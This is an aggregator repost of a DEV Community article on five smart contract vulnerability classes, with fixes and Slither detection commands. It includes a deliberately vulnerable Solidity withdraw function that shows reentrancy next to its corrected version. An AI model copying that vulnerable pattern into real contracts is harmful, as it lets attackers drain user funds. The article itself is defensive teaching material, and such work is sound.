惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Apple Machine Learning Research
Apple Machine Learning Research
C
Cisco Blogs
P
Privacy & Cybersecurity Law Blog
T
Tor Project blog
Google Online Security Blog
Google Online Security Blog
Scott Helme
Scott Helme
C
Cyber Attacks, Cyber Crime and Cyber Security
Recent Commits to openclaw:main
Recent Commits to openclaw:main
Hacker News - Newest:
Hacker News - Newest: "LLM"
N
News and Events Feed by Topic
The Register - Security
The Register - Security
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
SecWiki News
SecWiki News
T
True Tiger Recordings
T
The Exploit Database - CXSecurity.com
L
LINUX DO - 最新话题
Attack and Defense Labs
Attack and Defense Labs
S
Security @ Cisco Blogs
T
Troy Hunt's Blog
P
Palo Alto Networks Blog
T
Threat Research - Cisco Blogs
Simon Willison's Weblog
Simon Willison's Weblog
L
Lohrmann on Cybersecurity
T
Tailwind CSS Blog
有赞技术团队
有赞技术团队
阮一峰的网络日志
阮一峰的网络日志
IT之家
IT之家
J
Java Code Geeks
Hugging Face - Blog
Hugging Face - Blog
The Hacker News
The Hacker News
Jina AI
Jina AI
S
Secure Thoughts
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
爱范儿
爱范儿
月光博客
月光博客
S
Schneier on Security
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
博客园 - 【当耐特】
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
H
Hacker News: Front Page
Know Your Adversary
Know Your Adversary
PCI Perspectives
PCI Perspectives
罗磊的独立博客
A
Arctic Wolf
雷峰网
雷峰网
Hacker News: Ask HN
Hacker News: Ask HN
Google DeepMind News
Google DeepMind News
V
Visual Studio Blog
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
Latest news
Latest news

DEV Community

Tree Traversal: Why the Order You Pick Is a Data Flow Decision Optimizing Chunking and Data Extraction for Zero-Hallucination RAG Controlling Blender with AI — Building an MCP Server for 3D Creation Cursor users who write failing tests before prompting the AI complete features in 37% fewer iterations than those who pr When AI Becomes a Danger: 370,000 Grok Conversations Exposed I Refactored 100 Functions With Claude. CI Was Green. Production Got Slower in 7 Spots. I read my own commits like a stranger Child Safety vs. Data Center Dollars The Reason Your AI Chatbot Feels Fast Has Nothing to Do With a Better Model Beyond Vibe-Coding What I learned testing AI translation tools in 2026 (DeepL is still good, but LLMs caught up) AWS ECS Fargate Cost Allocation: Why Your Per-Cluster Spend Shows as One Line How to Surface License Violations in GitHub Advanced Security with feluda We Deleted 10 Real Users with a Test-Cleanup Script — RCA The Decision Subtraction Framework: How to Evaluate Any AI Tool How I Access My Home PC From Anywhere Without Spending a Penny # agents.md: Teaching AI Agents How to Scrape (The Future of Web Automation) KAI vs Global vs Tojiro vs Miyabi: How to Actually Tell Japanese Knife Brands Apart Why We Accidentally Blocked Our Users: A Deep Dive into Idempotency in Distributed Systems I Connected Hermes Agent to a Live MCP Server with 59 Tools and Here's What It Actually Built Our first app is finally live on the Play Store after 4 months of hard work 🚀 I Built UUIDs That Look Random But Sort Like Timestamps (50% Smaller Indexes!) The Night Our Event Pipeline Crashed Because We Didn't Measure Memory First How to Control Token Spend in Codex-Style AI Workflows Understanding the Model Context Protocol (MCP): Complete Guide 185,000 Affected in 7-Eleven Breach: Why Salesforce Is the New Soft Target for ShinyHunters Hack your AWS CLI to add CloudShell support and turn your terminal into a bastion How to Check Telegram Account Age and Estimated Creation Date ChromaDB vs Qdrant vs Weaviate vs pgvector: vector database shootout 2026 Robinhood Just Launched AI Trading Agents — Here's the Economic Data API They Need Robinhood Just Launched AI Trading Agents — Here's the Economic Data API They Need Dhrishti Part 1 - Building Runtime Observability for Distributed Systems CSS Box Shadows: The Complete Guide From Flat to Floating When I Learned Python, I Made a CLI Tool I built a free API that measures the cost of software complexity My AI Agent Hit a Duplicate Post Error. Here Is the Engineering Lesson. How I Revived a Paused Agri-Tech App to Empower Farmers Using GitHub Copilot PostgreSQL 01003 오류 원인과 해결 방법 완벽 가이드 Introducing the UCP Playground Extension: An AI Shopping Agent in Your Side Panel Demystifying WebP to PNG: Secure Serverless Edge Routing Configurations Without Leaking Credentials Age Verification's Dirty Secret: The Tech Works. The System Doesn't. Tipos de errores, Wrapping e Inspección en Go The Next Decade of Data Engineering: From Modern Data Stack to Data Engineering Harness Tell me which LLM and cloud base suitable for creating agentic coding AI. it's all coverup the BMDA like 1. Business Understanding 2. Model / Architecture Design 3. Agile Development 4. Deployment & Monitoring Why Traditional QA Fails Browser-Based Casino Games I Built Sổ Lãi, a Practical Profit Tracker for Vietnamese Online Shops Bugs not dead: How to catch bugs in game code GitHub Suspended My 2-Year Developer Account — Here’s What I Learned April ecommerce grew at 11% - here's what that means for backend infrastructure Go Modules in Practice: Init, Tidy, Vendor, and Publishing Packages Building Metadata Capabilities in Apache SeaTunnel: A Committer’s Journey How to Correctly Read a PostgreSQL EXPLAIN ANALYZE Output label and Input Tag I Revived Intelliyash: A Local-First AI Builder for Low-End Machines How I Added dbt Cloud to Coral — My Open Source Hackathon Journey vens-action: reranking Trivy/Grype CVEs by real risk in CI Le projet qui fonctionnait… mais que je détestais modifier Magento 2 Static Content Deploy Optimization: Faster Builds, Fewer Headaches Top API Gateways for AI Applications and Agentic Workflows (2026 Developer Guide) Seasons time-lapse - alignment Struggle is part of mastery — stop skipping it We built a 5-level MLM referral system. 6 months, 6 users, $0 earned. Here's what we learned killing it Transforming XML to JSON and CSV with XSLT Building a Side Project with AI Pair Programming: Lessons Learned with Sharebox I Made Local AI Faster Than the Cloud — A Complete Home Automation Voice Control Journey An MCP server can vanish from your AI agent mid-conversation. Here's the 30-second timeout that did it to me. I Was Wrong About Events for Three Years—Until I Learned What Async Runtime Was Really Costing SleepPublish vs Zapier: Handling Your Heavy Auto Publish Tasks Mastering the print() Function in Python EIP-7928 parallelization, native privacy roadmap, EIP-8141 deep dive, EF restructuring Turning a Toaster Oven into a Reflow Oven — A Safety Design Story 20 Currency & Exchange Rate API Questions Answered (2026) — Exchange Rate API SurrealDB 3.1: stability, DiskANN, and a new release process Git Workflows: From Solo to Team (2026) Why Your OpenAI Wrapper Is Costing Too Much (And How LangGraph Fixes It) Veltrix and the Day the Trace Loops Broke Building an SEO crawler in TypeScript: what I learned Benchmarking the Claude Agent SDK on a local LLM: Haiku and Sonnet tier performance 82% of Phishing Attacks Are Now AI-Generated - And File Sharing Is a Key Attack Vector We Measured LLM Prompt Caching in Production — Same Prompt, 0% to 91% Hit Rates We gave Kiro a brain for AWS, locally, for free We Built an AI Voice Agent That Calls Real Estate Leads in Under 5 Minutes. Here's How I got tired of bloated reminder apps, so I built one in Java I Built a Fully Autonomous Social Media Agent in 72 Hours — Here's the Architecture 1 Minute SQL Tips with WoWSQL — 28 May 2026 Understanding known_hosts and Host Key Verification: What It Protects Against and How TOFU Works A-Z AI Glossary From a Forgotten Multiplayer Prototype to a Chaotic Hidden-Object Game — Reviving WhatUsee 🚀 Handling Localization in PCF Components: A Practical Walkthrough AI Agents Are Great at 80% of Our Code. The Other 20% Is Why We Still Need Seniors. How to Monitor AI Agents in Production I Analyzed 1,000 AI-Generated Blog Posts for Quality. Here's the Data. From Forgotten Repo to Live App: How I Finished Photremium.com Using GitHub Copilot Custodial vs trust-minimized: two settlement layers for the agent economy Treasure Hunting at Scale: Why Our Cache-Aside Cache Cost Us 40% in Tail Latency During Black Friday Designing Forms an AI Agent Can Actually Submit You’re Ignoring 95% of Your LLM Response From Abandoned Prototype to AI-Powered Google Form Platform Beginner’s AI Glossary PostgreSQL 01008 오류 원인과 해결 방법 완벽 가이드
5 Smart Contract Vulnerabilities Every Developer Should Know in 2026
Ahmed Moussa · 2026-05-28 · via DEV Community

Ahmed Moussa

Smart contracts manage over $90 billion in total value locked across DeFi protocols. Yet the vulnerability classes that enabled the 2016 DAO hack remain present in production code today.

1. Reentrancy — The Vulnerability That Wont Die

The pattern is simple: your contract sends ETH before updating its own state, and the recipient calls back into your contract while the state is stale.

\`solidity
// VULNERABLE
function withdraw() external {
uint256 amount = balances[msg.sender];
(bool success, ) = msg.sender.call{value: amount}("");
require(success);
balances[msg.sender] = 0; // Too late!
}

// FIXED: Checks-Effects-Interactions
function withdraw() external nonReentrant {
uint256 amount = balances[msg.sender];
balances[msg.sender] = 0; // State update FIRST
(bool success, ) = msg.sender.call{value: amount}("");
require(success);
}
`\

Detection: Run slither . --detect reentrancy-eth\ on every PR. Use OpenZeppelin ReentrancyGuard.

2. Oracle Manipulation — When Price Feeds Lie

DeFi protocols relying on single-source spot prices are vulnerable to flash loan attacks. The attacker borrows, manipulates the AMM price, triggers liquidation at the wrong price, and repays — all in one transaction.

Fix: Use Chainlink or Uniswap V3 TWAP (30-minute window). Never use getReserves()\ for pricing decisions. Cross-check multiple oracle sources.

Euler Finance lost ~$197M in March 2023 from manipulated collateral values.

3. Access Control Failures

Functions like mint()\, pause()\, or setFee()\ left public without modifiers. Simple oversight, catastrophic impact.

\solidity
// Use OpenZeppelin AccessControl
function mint(address to, uint256 amount) external onlyRole(MINTER_ROLE) {
_mint(to, amount);
}
\\

Detection: slither . --detect suicidal,unprotected-upgrade\ catches most patterns.

4. Integer Overflow in Unchecked Blocks

Solidity 0.8+ has overflow protection, but unchecked\ blocks bypass it. Developers use it for gas savings, creating the same old bugs.

Rule: Only use unchecked\ for loop counter increments where overflow is provably impossible. Never for user-controlled inputs.

5. Cross-Chain Message Verification

Bridge exploits produced the largest DeFi losses: Ronin ($624M, 2022), Wormhole ($326M, 2022), Nomad ($190M, 2022).

Every cross-chain message receiver needs 5 checks:

  1. Caller is the bridge contract
  2. Source chain is allowed
  3. Sender is trusted on that chain
  4. Replay protection (message hash dedup)
  5. Payload bounds validation

Security Checklist

Check Tool
Reentrancy slither . --detect reentrancy-eth\
Access control slither . --detect suicidal\
Unchecked blocks grep -rn unchecked contracts/\
Oracle usage Search for getReserves\ calls
All detectors slither . --detect all\

The most effective defense combines automated scanning on every commit, formal verification for critical functions, and manual audit before mainnet.

If you are looking for automated security scanning for your codebase, check out our free security audit API — 10 free scans per month, returns structured vulnerability reports with severity and remediation guidance.

此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。